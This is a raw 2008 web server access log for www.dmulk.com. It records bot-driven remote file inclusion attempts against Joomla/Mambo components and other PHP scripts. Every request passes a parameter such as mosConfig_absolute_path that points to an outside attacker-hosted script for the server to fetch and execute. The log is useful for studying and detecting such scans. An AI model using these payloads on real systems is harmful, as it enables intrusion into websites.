212.113.24.154 - - [02/May/2008:09:17:01 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:17:01 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:17:02 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:17:02 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:17:03 -0700] "GET //config/dbutil.bck.php?confdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:09:17:03 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [02/May/2008:09:17:03 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.dawntown.ru/cache/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:17:05 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:17:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:17:06 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:17:06 -0700] "GET /logs/index.php?configFile=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:17:06 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:17:07 -0700] "GET /index.php?configFile=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:17:11 -0700] "GET /logs//cutenews/inc/shows.inc.php?cutepath=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:17:15 -0700] "GET /logs/ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:17:15 -0700] "GET /ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:17:16 -0700] "GET //cutenews/inc/shows.inc.php?cutepath=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:17:27 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:17:28 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:17:28 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:17:33 -0700] "GET /logs/access_080115.log/ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:17:33 -0700] "GET /ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:17:33 -0700] "GET /logs/ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.191.81.165 - - [02/May/2008:09:17:39 -0700] "GET /logs/access_080219.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:17:58 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:17:58 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:17:58 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:18:02 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:18:08 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:18:13 -0700] "GET /logs/access_080115.log/ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:18:13 -0700] "GET /ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:18:14 -0700] "GET /logs/ldap/authldap.php?includePath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:09:18:24 -0700] "GET /logs/access_080116.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:18:40 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:18:40 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:18:40 -0700] "GET /logs/access_080219.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:18:50 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:18:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:18:51 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:19:39 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:19:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:19:40 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:19:49 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:19:51 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:19:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:19:52 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:19:53 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:19:54 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:19:55 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:19:55 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:19:58 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:19:59 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:19:59 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:00 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:00 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:20:02 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:05 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:07 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:07 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:20:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:20:13 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:20:18 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:20:27 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:20:28 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:20:29 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:20:35 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:20:36 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:41 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:20:43 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:43 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:44 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:20:52 -0700] "GET /logs/access_080218.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:20:52 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:20:54 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:20:55 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:21:05 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:21:06 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:21:26 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.44.68 - - [02/May/2008:09:21:26 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [02/May/2008:09:21:26 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:21:28 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:21:32 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:21:36 -0700] "GET /logs//include.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:21:37 -0700] "GET //include.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:21:38 -0700] "GET /logs/access_080220.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:21:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:21:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:22:01 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:22:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:22:01 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:22:02 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:22:02 -0700] "GET /logs/access_080225.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:22:06 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:22:07 -0700] "GET /logs/access_080205.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:22:07 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:22:09 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:22:09 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:22:09 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:22:11 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:22:12 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:22:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:22:24 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:22:29 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:22:32 -0700] "GET /logs/access_080127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:22:37 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:22:42 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:22:48 -0700] "GET /logs/access_080205.log/SQuery/lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:22:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:22:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [02/May/2008:09:22:55 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kingdomtechonline.com/BrUtAl?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:09:22:59 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:23:00 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:09:23:00 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:23:02 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
